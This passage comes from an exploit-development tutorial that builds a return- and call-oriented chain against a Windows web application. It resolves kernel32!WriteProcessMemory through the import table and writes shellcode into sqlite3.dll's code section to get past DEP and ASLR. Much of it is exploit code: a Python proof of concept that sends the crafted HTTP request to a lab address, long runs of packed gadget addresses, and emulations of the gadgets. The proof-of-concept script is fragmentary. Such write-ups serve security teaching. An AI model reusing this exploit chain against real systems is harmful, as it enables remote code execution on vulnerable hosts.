After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop
ecx gadget.
The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.
Program execution then transfers to the sub eax, ecx ROP gadget, which will place the
difference into the EAX register.
The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do
this for us.
0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret ; (1 found)
This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur -
which is meaningless because ECX and EAX already contain the same value - meaning this part
of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes,
which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well,
but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution
flow off.
leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.
mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.
We know that EAX currently contains our target address. We can also recall from earlier that
EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes
- the mov esp, ebp portion of leave, which sets ESP to whatever EBP is, would load ESP with the
address we precomputed (what was ESP + 0x24 before the gadget started). Because the add esp, 0x24
instruction has already executed by the time leave is reached - this effectively ends up setting
ESP to its own current value, which is what we want. The goal here is to keep ESP pointing at our
controlled data, which consists of our ROP gadgets.
It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at
the moment. Viewing this step by step in the debugger will help make sense of all of this.
Note, after each gadget - obviously the value of ESP changes. For completeness’ sake, until we
hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38
(even though the offset will technically shrink after each gadget is executed).
First, as mentioned above, we need to get the value in EAX into EBP to prepare for
the leave instruction.
How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains
the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0,
which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially
“moving” the address into EBP.
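To make the interaction between add ebp, eax and the leave-terminated gadget easier to follow, here is a toy emulation in Python. It is a sketch under stated assumptions: the target address, the padding values and the next-gadget marker are invented, and the stack is laid out so that the chain continues right after the padding.

```python
MASK = 0xFFFFFFFF


def run_chain(target, next_gadget=0x41414141):
    """Emulate 'add ebp, eax ; ret' followed by
    'mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret'."""
    mem = {}                                  # sparse stack: address -> DWORD
    regs = {"eax": target, "ebp": 0, "ecx": 0, "ebx": 0}

    # ESP as it stands when the second gadget starts executing (assumed layout).
    esp = (target - 0x28) & MASK
    mem[esp + 0x24] = 0x90909090              # padding consumed by pop ebx
    mem[target] = 0x90909090                  # padding consumed by pop ebp (leave)
    mem[target + 4] = next_gadget             # consumed by the final ret

    # Gadget 1: add ebp, eax. EBP is 0, so this acts like mov ebp, eax.
    regs["ebp"] = (regs["ebp"] + regs["eax"]) & MASK

    # Gadget 2
    regs["ecx"] = regs["eax"]                 # mov ecx, eax
    regs["eax"] = regs["ecx"]                 # mov eax, ecx (no effect)
    esp = (esp + 0x24) & MASK                 # add esp, 0x24
    regs["ebx"] = mem[esp]                    # pop ebx
    esp += 4
    esp = regs["ebp"]                         # leave, part 1: mov esp, ebp
    regs["ebp"] = mem[esp]                    # leave, part 2: pop ebp
    esp += 4
    eip = mem[esp]                            # ret
    esp += 4
    return regs, esp, eip


regs, esp, eip = run_chain(0x02826900)        # hypothetical stack address
print(hex(regs["eax"]), hex(regs["ecx"]), hex(esp), hex(eip))
```

In this model the mov esp, ebp inside leave does not move ESP at all, and EAX and ECX end up 8 bytes below ESP once the gadget returns, which is close enough for later relative calculations.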
Let’s step through all of this in WinDbg - to make things a bit more clear.
Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.
After EBP is prepared, program execution reaches the next ROP gadget.
After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.
Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as
ECX (which is already equal to EAX) is placed into EAX.
Taking a look at the stack now, we can see our compensation for add esp, 0x24 and pop
ebx in the padding that precedes 0xCCCCCCCC.
Program execution has also reached the add esp, 0x24 instruction.
Stepping through the instruction, ESP has been set to the same value as EAX, ECX, and
EBP.
Then, pop ebx clears the last bit of “padding” on the stack.
After all of this has occurred, the leave instruction is loaded up for execution.
leave ; ret is executed, and the execution of our ROP chain resumes its course - all while
preserving ESP into ECX and EAX!
WriteProcessMemory() Parameters
Recall that we are dealing with the x86 architecture, meaning function calls go
through __stdcall instead of __fastcall. This means that instead of placing our function
arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our
parameters on the stack, as such.
To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we
can leverage the Import Address Table (IAT).
Whenever a program calls a Windows API function - it does not do so directly. A special table,
within the process space, known as the IAT essentially contains pointers to each needed API
function.
The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.
As is seen in the image above, the IAT just contains pointers to Windows API functions.
Meaning each of these entries points to a Windows API function.
We have “the base address” of each module (in reality, each module is just not compiled with
ASLR) - so that is no problem. However, the value that each of these entries holds (which
is the address of a Windows API function) will change upon reboot.
The way to get around this would be to load the address of one of these IAT entries into a register
we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.
This would extract whatever ECX points to (which is the address of a Windows API function) and place
it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the
fact each IAT entry will always point to the same Windows API function (even if the address of the
API changes) to make sure this is not a problem.
Although the IAT for this application doesn’t directly contain a function pointer
to kernel32!WriteProcessMemory - it does contain pointers to other kernel32.dll functions, such
as kernel32!WriteFileImplementation. We also know that the distance between functions
within a DLL DOESN’T CHANGE. This means, the distance
between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always
remain the same for the current patch level and OS version.
This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.
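The arithmetic behind this primitive can be sketched as follows. Everything numeric here is hypothetical: the two RVAs and the two kernel32.dll base addresses are invented for illustration, and real values must be taken from the kernel32.dll on the target's patch level.

```python
MASK = 0xFFFFFFFF

# Hypothetical RVAs inside kernel32.dll for one specific build.
RVA_WRITEFILE_IMPL = 0x00012340
RVA_WRITEPROCESSMEMORY = 0x00045670

# The delta is constant for a given kernel32.dll build, whatever the ASLR base.
DELTA = RVA_WRITEPROCESSMEMORY - RVA_WRITEFILE_IMPL


def resolve_wpm(leaked_writefile_ptr):
    """Turn a pointer read from the IAT into the address of WriteProcessMemory."""
    return (leaked_writefile_ptr + DELTA) & MASK


for kernel32_base in (0x75A00000, 0x76F30000):    # two hypothetical ASLR bases
    leaked = kernel32_base + RVA_WRITEFILE_IMPL   # what the IAT entry would hold
    print(hex(kernel32_base), hex(resolve_wpm(leaked)))
```

In the ROP chain the same addition has to be done with gadgets, and the delta may need the negative-number treatment described earlier if it contains NULL bytes.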
The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this
will be used as the address in which program execution will transfer to AFTER the call
to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.
sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this
DLL is required for the application to work, we can target it as a place to write our shellcode.
With this method of ROP, we need to find an executable portion of memory within the
application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will
write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in
WinDbg, we can determine the .text section of the portable executable has execute
permissions. Also recall that even without write permissions, we can still write our shellcode if
we “proxy” the write through the API call.
Viewing the .text section address - we can see that the address chosen is just an executable
“code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the
program shouldn’t care.
This means, after the function call is completed and our shellcode is written here - program
execution will transfer to this address.
The handle parameter is quite easy to fill - we can even use a static value. According to
Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically,
it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1
or 0xFFFFFFFF, is a “special” constant that refers to a handle to the current process. This means,
whenever a Windows API function requests a handle (generally in user mode),
passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since
we would like to write our shellcode to memory within the process space -
passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we
would like to write the memory to virtual memory within the current process space.
lpBaseAddress will be the address of our shellcode, as already outlined by the “return”
parameter.
lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We
will dynamically resolve this with ROP gadgets.
We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86
at least), where we will place these parameter “placeholders” on the stack and then
dynamically change what these parameters point to in order to make a successful function call.
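As a rough sketch of what the placeholder block could look like, the following Python lays out the seven DWORDs in stdcall order. The lpBuffer and nSize placeholders (0x11111111 and 0x22222222) and the pseudo handle come from this write-up. The function-pointer placeholder, the code cave address and the lpNumberOfBytesWritten address are invented values for illustration only.

```python
import struct

# (description, value) pairs in the order they sit on the stack.
params = [
    ("WriteProcessMemory pointer", 0x45454545),   # hypothetical placeholder
    ("return address (code cave)", 0x61C7AAAA),   # hypothetical address
    ("hProcess (pseudo handle -1)", 0xFFFFFFFF),
    ("lpBaseAddress (code cave)", 0x61C7AAAA),    # hypothetical, same as return
    ("lpBuffer placeholder", 0x11111111),
    ("nSize placeholder", 0x22222222),
    ("lpNumberOfBytesWritten", 0x61C7BBBB),       # hypothetical writable address
]

frame = b"".join(struct.pack("<L", value) for _, value in params)
offsets = {name: index * 4 for index, (name, _) in enumerate(params)}

for name, value in params:
    print("+0x%02x  0x%08x  %s" % (offsets[name], value, name))
print("total size: 0x%x" % len(frame))
```

The block is 0x1C bytes long, which lines up with the add esp, 0x1C gadget used to hop over it, and the nSize placeholder sits 0x14 bytes past the function pointer placeholder.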
Here is the PoC we will be using.
import sys
import os
import socket
import struct
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
# loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
# placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
# gadget which moves EAX into ECX via "leave")
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
# eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
# compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
# down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
# to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebp in leave instruction)
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
The above PoC places the parameters on the stack and also performs a “jump” over them
with add esp, 0x1C. Let’s examine this in the debugger.
The following is the state of the stack - with the kernel32!WriteProcessMemory parameters
outlined in red.
The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we
can see the stack moves further down.
We can see that we have moved further into our buffer, where our future ROP gadgets will
reside. The parameters for the function call are now “behind” where program execution is -
meaning we will not inadvertently corrupt these parameters because they are not within the
current execution flow.
Now that this is out of the way - we can “officially” begin our ROP chain to obtain code
execution.
lpBuffer
The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to
the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a
source buffer and write it somewhere else. Since we have control of the stack, we will just
preemptively place our shellcode there. This is where the headache of storing an address near
the stack in EAX and ECX will come into play.
As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.
The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.
Let’s say we get the parameter placeholder’s location (i.e. the virtual memory address, not
the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be
reading the address 0x2826930. However, if we read the value of dword ptr [ecx] instead - we
would be reading the actual value of 0x11111111.
The first part of the image above shows the value of the address itself. The second part of the
image shows what happens when we “dereference” (using poi in WinDbg), or extract the value
a memory address is pointing to. We can leverage this, by using an arbitrary write primitive.
When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX,
but rather dword ptr [ecx] - which will force the address on the stack (which contains the
parameter placeholder) to point to something other than 0x11111111.
Remember - every time the process is terminated and restarted - the virtual memory on the
stack changes. This is why we need to dynamically resolve this parameter, instead of
hardcoding an address.
We will use the following ROP gadgets, in order to make ECX contain the stack address holding
the lpBuffer parameter placeholder.
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
Two things about the above ROP gadgets. First, the clc instruction.
clc is an assembly instruction that clears the “carry” flag (CF, a bit in the EFLAGS register). None of our ROP
gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides
in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are
not using the EDX register for anything - so this instruction will not disrupt what
we are trying to achieve.
Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10
hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away
(24 decimal bytes).
This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar
to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the
stack address of our shellcode and dword ptr [ecx] contains the stack address which is
currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX
is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our
shellcode.
However, there were no such gadgets that were found easily in the process memory. The
closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX by 0x10
instead of 0x18 - due to the gadget writing to the address in ECX plus an offset of 0x8 (0x18 - 0x10 =
0x8).
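The pointer-overwrite idea can be modelled with a dictionary standing in for stack memory. This is a sketch only: 0x2826930 is the placeholder address shown earlier in this write-up (it changes on every run), and the shellcode address placed in EAX is a made-up value.

```python
MASK = 0xFFFFFFFF

placeholder_addr = 0x02826930            # stack address of the lpBuffer placeholder
mem = {placeholder_addr: 0x11111111}     # toy stack memory: address -> DWORD

ecx = placeholder_addr - 0x18            # ECX starts 0x18 bytes behind the placeholder
eax = 0x02826C00                         # hypothetical stack address of the shellcode

print(hex(ecx), hex(mem[placeholder_addr]))   # address vs. dereferenced value

for _ in range(0x10):                    # sixteen inc ecx gadgets
    ecx = (ecx + 1) & MASK

# mov dword ptr [ecx+0x8], eax writes through the pointer, leaving ECX untouched
mem[(ecx + 0x8) & MASK] = eax

print(hex(ecx), hex(mem[placeholder_addr]))
```

After the sixteen increments ECX is 0x8 bytes short of the placeholder, so the write at [ecx+0x8] lands exactly on it.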
The key is now to give some padding between the space on the stack for our future ROP
gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on
the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP
gadgets and choose a place on the stack that our shellcode will go, and start performing these
calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we
would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we
would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we
will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following
ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into
EAX.
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
The location where our shellcode will be (your location can be different, depending on how far
down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our
shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for
just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte
problem would kill our exploit. This is because a 32-bit register, like EAX, needs the
value 0x000002dc to completely fill its contents. To address this, we can use negative numbers
and subtraction to yield the same result!
The negative representation of 0x2dc will be loaded into ESI. We will then need to also
compensate for the add esp, 0x8 instruction. To do this, we will add 0x8 bytes of padding so
no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the
difference in EAX. This will result in the address of where our shellcode will go being placed
into EAX. Additionally, we need to compensate for the two pop instructions in the second gadget.
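One way this stack segment could be laid out is sketched below. The two gadget addresses and the 0x2dc distance come from the text above. The p32 helper and the 0x90909090 padding value are assumptions for illustration, and your own padding and offset may differ.

```python
import struct


def p32(value):
    """Pack a value as a little-endian DWORD, wrapping negatives to 32 bits."""
    return struct.pack("<L", value & 0xFFFFFFFF)


PAD = 0x90909090                 # assumed padding value

segment = p32(0x1001fce9)        # pop esi ; add esp, 0x8 ; ret
segment += p32(-0x2dc)           # popped into ESI (0xfffffd24)
segment += p32(PAD) * 2          # 0x8 bytes skipped by add esp, 0x8
segment += p32(0x10022f45)       # sub eax, esi ; pop edi ; pop esi ; ret
segment += p32(PAD) * 2          # consumed by pop edi and pop esi

eax = 0x02826924                 # hypothetical value of EAX before the routine
new_eax = (eax - ((-0x2dc) & 0xFFFFFFFF)) & 0xFFFFFFFF

print(len(segment), hex(new_eax))
```

Subtracting the negative value moves EAX 0x2dc bytes further down the stack, and none of the packed DWORDs contains a NULL byte.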
Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating
gadget(s).
Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as
expected.
Program execution then redirects to the EAX manipulation routine.
The last step is to utilize the following ROP gadget to change the lpBuffer parameter
placeholder to point to the legitimate parameter (which is the shellcode location down the
stack).
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)
Program execution reaches the gadget in question.
As we can already see from the image above, 0x11111111 (which is the parameter placeholder
for lpBuffer) is going to be what is overwritten with the contents of EAX (which contains the
stack address that points to our shellcode).
State of the lpBuffer parameter placeholder before the instruction is stepped through.
After stepping through the instruction - we can see the lpBuffer parameter placeholder has
been dynamically changed to the correct address!
nSize
nSize, as you can recall from earlier, refers to the size of our region of memory we would like
written in the process space. We would like the size of our shellcode to be about 0x180 bytes
(384 decimal) - as this is more than enough for any type of shellcode.
Since ECX and EAX are being used for stack addresses - let’s use another register for this
parameter. Let’s use EDX.
Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of
0x20.
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is
placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and
pick up the next gadget.
Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our
ROP chain, as execution will not redirect back to the stack. However, there is a way around this
- with a technique called Call-oriented Programming (COP).
Essentially, since we know that EDI will be called, we could pop into EDI the address of a ROP gadget which would
perform an add esp, X ; ret. Why add esp, X you may ask?
As you may, or may not, know - when a call instruction is executed - it pushes its return
address onto the stack. This is done so the called code knows where to return after it is done
executing. However, we can just execute an add esp, X gadget to jump over this return address
and back into our ROP chain. However, there is one more thing that we need to take into
account from our gadget, and that is push edx.
This will push the EDX register onto the stack before the call instruction pushes its return
address onto the stack - meaning a total of 0x8 bytes (2 DWORDs) will be pushed onto the
stack. To compensate for this, we will load the address of an add esp, 0x8 ; ret gadget into EDI.
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
First, program execution hits our pop edi instruction, which will load the “return to the stack”
ROP gadget into EDI.
pop edi places the address of that gadget into EDI.
The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.
Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until
EDX has been filled with 0x180.
push edx is then executed, resulting in EDX being placed onto the stack.
call edi is now about to be executed. Stepping through the instruction, with t in WinDbg,
pushes the caller’s return address onto the stack.
Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the
stack - where the exact same routine will be repeated until 0x180 is placed into EDX.
After repeating the routine, EDX now contains 0x180.
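The COP round trip can be emulated with a small Python model to confirm that each add edx, 0x20 ; push edx ; call edi gadget behaves like an ordinary ret-terminated gadget once EDI holds add esp, 0x8 ; ret. This is a sketch: the stack base, the end-of-chain sentinel and the value standing in for the return address pushed by call are all invented.

```python
MASK = 0xFFFFFFFF
COP_GADGET = 0x1001b884      # add edx, 0x20 ; push edx ; call edi (from the text)
RETURN_GADGET = 0x1001c31e   # add esp, 0x8 ; ret (from the text)
END_OF_CHAIN = 0xDEADBEEF    # made-up sentinel marking the end of the toy chain
CALL_RETURN = 0xCAFEBABE     # stand-in for the return address pushed by call edi


def run_cop(count, stack_base=0x02826A00):
    """Emulate `count` COP gadgets and report the final EDX, EIP and ESP."""
    mem = {stack_base + 4 * i: COP_GADGET for i in range(count)}
    mem[stack_base + 4 * count] = END_OF_CHAIN

    edx, edi, esp = 0, RETURN_GADGET, stack_base   # EDX zeroed, EDI preloaded
    eip = mem[esp]                                 # ret into the first gadget
    esp += 4
    while eip == COP_GADGET:
        edx = (edx + 0x20) & MASK                  # add edx, 0x20
        esp -= 4
        mem[esp] = edx                             # push edx
        esp -= 4
        mem[esp] = CALL_RETURN                     # call edi pushes a return address
        eip = edi                                  # and jumps to add esp, 0x8 ; ret
        esp += 8                                   # add esp, 0x8 skips both DWORDs
        eip = mem[esp]                             # ret picks up the next chain entry
        esp += 4
    return edx, eip, esp


edx, eip, esp = run_cop(12)
print(hex(edx), hex(eip), hex(esp))
```

The two pushed DWORDs land on stack slots that have already been consumed, so the upcoming chain entries are never clobbered, and twelve iterations leave 0x180 in EDX.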
Now that EDX contains our intended value of 0x180, we can use the same kind of mov
dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with our intended
value of 0x180.
We will use the ECX register, which currently still contains the address on the stack that holds the
now correct lpBuffer parameter, minus 0x8 (remember, ECX was used at an offset of 0x8 last
time, meaning it is 0x8 bytes behind the lpBuffer parameter, which is itself 4 bytes
behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).
As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted
by 0x22222222).
Utilizing an inc ecx gadget similar to the one from the previous ROP routine - we can increase ECX
by 12 decimal (0xC) bytes, to load the parameter placeholder address for nSize.
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
